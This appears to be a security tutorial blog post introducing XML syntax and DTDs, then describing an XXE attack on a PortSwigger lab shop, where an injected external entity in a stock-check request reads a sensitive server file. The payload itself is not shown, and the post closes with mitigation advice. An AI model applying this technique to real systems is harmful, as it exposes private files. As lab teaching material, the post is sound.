What is XML?
XML stands for eXtensible Markup Language. It defines a set of rules for encoding data in a format that is readable by both machines and humans. XML is widely used: many document formats have been built on XML syntax, for example RSS, Atom and Microsoft Office. Many software development frameworks, such as Microsoft .NET, also use XML files to configure applications and define their properties.
Before diving into XML attacks, we need to understand a few XML terms.
Markup and Content
An XML document as a whole consists of two kinds of text: markup and content. Markup generally begins with the character \< or & and ends with \> or ;. Any string that is not markup is content.
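To make the markup/content split concrete, here is a minimal Python sketch that applies the rule above literally: runs that start with < and end with >, or start with & and end with ;, count as markup, and everything else counts as content. The function name split_markup is made up for this illustration, and the sketch deliberately ignores comments, CDATA sections and processing instructions (which can contain > characters), so it is not how a real XML parser tokenizes.

```python
import re

# Markup: "<...>" tags or "&...;" entity/character references.
# Content: any run of text containing neither "<" nor "&".
TOKEN = re.compile(r"<[^>]*>|&[^;]*;|[^<&]+")

def split_markup(xml_text):
    """Return a list of (kind, text) pairs, where kind is 'markup' or 'content'."""
    pairs = []
    for token in TOKEN.findall(xml_text):
        kind = "markup" if token[0] in "<&" else "content"
        pairs.append((kind, token))
    return pairs

if __name__ == "__main__":
    for kind, text in split_markup("<fname>Malav &amp; co</fname>"):
        print(f"{kind:8} {text!r}")
```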
Within the markup, any string that begins with \< and ends with \> is called a tag.
Just like HTML, XML has both start tags and end tags.
A start tag looks like \<name\> and an end tag looks like \</name\>.
The part of an XML document that begins with a start tag and ends with the matching end tag is an element. Everything between the start tag and the end tag is the element's content.
If an element contains another element, it is called the parent of that child element. For example:
\<Employee\>
\<fname\> Malav \</fname\>
\<lname\> Vyas \</lname\>
\</Employee\>
Here, Employee is the parent element, and fname and lname are its child elements.
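A parser exposes this parent/child relationship directly. The sketch below uses Python's standard-library xml.etree.ElementTree (our choice for illustration; the article itself does not use Python) to load the Employee snippet and walk its children.

```python
import xml.etree.ElementTree as ET

# The Employee snippet from above, including its enclosing parent element.
EMPLOYEE_XML = """
<Employee>
    <fname> Malav </fname>
    <lname> Vyas </lname>
</Employee>
"""

root = ET.fromstring(EMPLOYEE_XML.strip())  # root is the parent element, <Employee>
print("parent:", root.tag)
for child in root:  # iterating an Element yields its direct child elements
    # .text holds the element content; strip() drops the surrounding spaces
    print("child:", child.tag, "=", child.text.strip())
```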
Key-value pairs written inside a start tag are called attributes. For example:
\<Employee branch="New York"\>
Here, branch is the attribute name and "New York" is its value.
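Attributes can be read the same way. This sketch completes the start tag above with a child element and an end tag so that it parses; the attribute name dept is made up and only shows what a lookup of a missing attribute returns.

```python
import xml.etree.ElementTree as ET

# The Employee start tag from above, completed so it is a well-formed element.
elem = ET.fromstring('<Employee branch="New York"><fname>Malav</fname></Employee>')

print(elem.attrib)         # all attributes as a dict: {'branch': 'New York'}
print(elem.get("branch"))  # value of one attribute: New York
print(elem.get("dept"))    # hypothetical, absent attribute: None
```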
Document Type Definition (DTD)
According to Wikipedia, a document type definition (DTD) is a set of markup declarations that define a document type for markup languages such as XML.
In other words, a DTD declares which elements a document may contain and how they are nested, so that a validating parser can check the document against it.
Consider the following XML file, xxe.xml:
\<?xml version="1.0" encoding="UTF-8"?\>
\<!DOCTYPE University SYSTEM "xxe.dtd"\>
\<University\>
\<Employee\>
\<name\> Bob \</name\>
\<salary\> 4000 \</salary\>
\</Employee\>
\<Student\>
\<name\> Marley \</name\>
\<grade\> A \</grade\>
\</Student\>
\</University\>
The first line sets the XML version of the document to 1.0 and its encoding to UTF-8.
Because the element definitions live in a separate document, the DOCTYPE declaration that follows tells the XML parser to include an external document type definition (DTD) file, xxe.dtd.
After these declarations, the XML content begins. The root node is University, which has the child nodes Employee and Student. Likewise, Employee contains the sub-nodes name and salary, while Student contains name and grade.
Because the document uses custom tags, the DTD file has to tell the parser what to expect for each custom element.
The xxe.dtd file looks like this:
\<!ELEMENT University (Employee, Student)\>
\<!ELEMENT Employee (name, salary)\>
\<!ELEMENT Student (name, grade)\>
\<!ELEMENT name (#PCDATA)\>
\<!ELEMENT salary (#PCDATA)\>
\<!ELEMENT grade (#PCDATA)\>
Here, \<!ELEMENT\> declares a new element type for the XML document.
The first declaration defines the University element, which must contain exactly one Employee element followed by one Student element.
The second and third declarations define the Employee and Student elements: Employee expects name and salary elements, while Student expects name and grade elements.
Finally, we declare the leaf elements name, salary and grade.
Here, #PCDATA means parsed character data: the element holds only text, which the parser processes (for example, expanding entity references) instead of child elements.
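Python's standard-library XML parsers do not validate against a DTD (the xmllint tool used next does). To show what the declarations above actually demand, here is a deliberately simplified checker. It hard-codes the xxe.dtd rules in a dict named CONTENT_MODELS (our own name), supports only plain sequences such as (Employee, Student) and (#PCDATA), and does not read the DOCTYPE line at all. It is an illustration, not a general DTD validator.

```python
import xml.etree.ElementTree as ET

# The xxe.dtd declarations, transcribed by hand. A tuple is an ordered sequence
# of required children; "#PCDATA" means text only, with no child elements.
CONTENT_MODELS = {
    "University": ("Employee", "Student"),
    "Employee": ("name", "salary"),
    "Student": ("name", "grade"),
    "name": "#PCDATA",
    "salary": "#PCDATA",
    "grade": "#PCDATA",
}

def validate(elem, errors=None):
    """Recursively check elem against CONTENT_MODELS; return a list of errors."""
    if errors is None:
        errors = []
    model = CONTENT_MODELS.get(elem.tag)
    children = [child.tag for child in elem]
    if model is None:
        errors.append(f"undeclared element <{elem.tag}>")
    elif model == "#PCDATA":
        if children:
            errors.append(f"<{elem.tag}> may contain only text, found {children}")
    elif tuple(children) != model:
        errors.append(f"<{elem.tag}> expects {list(model)}, found {children}")
    for child in elem:
        validate(child, errors)
    return errors

DOC = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE University SYSTEM "xxe.dtd">
<University>
  <Employee><name> Bob </name><salary> 4000 </salary></Employee>
  <Student><name> Marley </name><grade> A </grade></Student>
</University>"""

print(validate(ET.fromstring(DOC)))  # an empty list means no violations
```

Dropping the Employee element, for instance, makes validate report that University expects Employee followed by Student.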
We can run these files through a parser to check whether they contain any errors.
For demonstration purposes, we use the xmllint parser:
xmllint --valid --noout --loaddtd xxe.xml
Here, --valid validates the document against its DTD, --noout suppresses printing of the parsed document (so nothing is printed if the file is valid), and --loaddtd tells the parser to fetch the external DTD file.
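An entity is a named piece of content declared in a DTD with \<!ENTITY\>; wherever the document references it as &name;, the parser substitutes the entity's value. An external entity takes its value from a URI given with the SYSTEM keyword, such as a local file, and XML eXternal Entity (XXE) attacks abuse exactly this to make a server read data it should not expose. Because XXE flaws are easy to overlook and hard to discover, they are widespread, which is why XXE was ranked fourth (A4) in the 2017 OWASP Top 10 list of web application security risks.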
For demonstration purposes, we will use the PortSwigger Web Security Academy XXE labs.
The demo e-commerce website presented in the lab contains an XXE vulnerability.
To inspect it, we open the details of any product.
Turn on Burp Suite and click Check stock to capture the request made by the browser.
The request should look like the following:
As the request shows, the web page builds an XML document from the selected product and store and sends it to the back end, which processes it and returns the stock level.
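A back end like this typically parses the request body and looks up the two values it contains. The sketch below is hypothetical: the element names stockCheck, productId and storeId are assumed from the lab's request, and the STOCK table, check_stock function and error message are made up. The point it illustrates is that whatever text the parser produces for productId is echoed in the response when the ID is not recognized.

```python
import xml.etree.ElementTree as ET

# Hypothetical stock table keyed by (product id, store id).
STOCK = {("1", "1"): 42, ("2", "1"): 7}

def check_stock(body):
    """Parse a stock-check request body and return the response text."""
    root = ET.fromstring(body)
    product_id = root.findtext("productId", default="").strip()
    store_id = root.findtext("storeId", default="").strip()
    units = STOCK.get((product_id, store_id))
    if units is None:
        # Echoing the parsed value back is what leaks data once entities are involved.
        return f"Invalid product ID: {product_id}"
    return str(units)

request_body = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
)
print(check_stock(request_body))  # 42
```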
We can send the request to Burp Repeater for closer analysis.
Now we can add a custom DTD to this XML that defines an entity which, when referenced, reads a sensitive file.
After defining the entity, we need to reference it.
To do so, we replace the product ID in the XML generated by the web page with a reference to our malicious entity, &exp;.
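The exact payload used in the lab is not reproduced in the text, so the sketch below shows a typical one under stated assumptions: the body uses the stockCheck/productId/storeId structure, the entity is named exp as above, and the target file is assumed to be /etc/passwd. The helper build_xxe_payload is hypothetical. Resolving a file:// entity locally would read from your own machine, so the second half only demonstrates the substitution mechanism with a harmless internal entity, which Python's ElementTree does expand.

```python
import xml.etree.ElementTree as ET

def build_xxe_payload(file_path="/etc/passwd", entity="exp", store_id="1"):
    """Hypothetical helper: a stock-check body whose productId references an
    external entity pointing at file_path."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE stockCheck [ <!ENTITY {entity} SYSTEM "file://{file_path}"> ]>'
        f"<stockCheck><productId>&{entity};</productId>"
        f"<storeId>{store_id}</storeId></stockCheck>"
    )

print(build_xxe_payload())

# Same shape, but with an internal entity whose value is a literal string.
# The parser replaces &exp; with the entity's value before the application
# sees productId; with SYSTEM, that value would be the file's contents.
harmless = (
    '<!DOCTYPE stockCheck [ <!ENTITY exp "text from the entity"> ]>'
    "<stockCheck><productId>&exp;</productId><storeId>1</storeId></stockCheck>"
)
print(ET.fromstring(harmless).findtext("productId"))  # text from the entity
```

Python's ElementTree does not expand external entities, so feeding it the first payload will not read the file; the lab's back end evidently uses a parser with external entities enabled.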
The contents of the sensitive file now appear in the response window.
Whenever possible, use simpler data formats such as JSON. Keep all XML processors and libraries up to date, and enable logging.
Disable DTD processing and external entity resolution in every XML parser the application uses.
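One way to apply this advice with Python's standard library is to refuse any document that contains a DOCTYPE declaration, because entities can only be declared inside one. The sketch below is our own illustration (parse_without_dtd and ForbiddenDTD are made-up names): a first pass with xml.parsers.expat raises as soon as a DOCTYPE starts, and only documents without one are handed to ElementTree.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat

class ForbiddenDTD(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""

def parse_without_dtd(data):
    """Parse data with ElementTree, but only after a first expat pass has
    confirmed the document has no DOCTYPE (and so no entity declarations)."""
    checker = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise ForbiddenDTD(f"DTD for <{name}> is not allowed")

    checker.StartDoctypeDeclHandler = on_doctype
    checker.Parse(data, True)  # raises ForbiddenDTD (or ExpatError) on bad input
    return ET.fromstring(data)

safe = parse_without_dtd("<stockCheck><productId>1</productId></stockCheck>")
print(safe.findtext("productId"))  # 1
```

Rejecting every DOCTYPE is stricter than turning off external entities alone, but it also shuts out entity-expansion tricks such as the "billion laughs" attack. For production code, the defusedxml package wraps the standard-library parsers and offers a forbid_dtd option that does this for you.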
Above all, user input should never be passed to an application without proper validation and sanitization.
The awesome image used in this article was created by catalyst.